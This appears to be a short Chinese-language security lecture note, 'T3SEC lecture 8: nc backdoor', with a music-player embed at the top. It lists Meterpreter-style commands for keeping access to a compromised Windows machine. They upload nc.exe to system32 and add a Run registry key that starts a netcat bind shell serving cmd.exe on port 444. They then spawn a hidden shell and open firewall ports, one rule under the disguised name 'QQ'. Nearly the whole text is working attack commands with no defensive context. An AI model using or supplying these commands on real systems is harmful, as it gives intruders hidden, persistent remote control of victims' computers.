T3SEC —–第八讲:nc后门
{% meting "2111364820" "tencent" "playlist" "theme:#FF4081" "mode:circulation" "mutex:true" "listmaxheight:200px" "preload:auto" "autoplay" %}
隐藏后门
1.nc后门上传
- upload/root/nc.exe c:\\windows\system32
2.修改注册表
- reg enumkey -k
- HKLM\softfware\microsoft\windows\currentversion\run
- reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\Windows\system32\nc.exe -Ldp 444 -e cmd.exe' //添加nc键值
- reg queryval -k
- HKLM\software\microsoft\windows\currentversion\run -v nc //查看
3.防火墙 允许端口
- execute -f cmd -i -H //生成shell
- cmd: netsh firewall show opmode //查看防火墙状态.
- netsh firewall add portopening tcp 444 "textx" ENABLE ALL
- netsh firewall add portopening TCP 4444 "FireWall" ENABLE ALL
- netsh firewall add portopening TCP 7776 "QQ" ENABLE ALL
Q.E.D.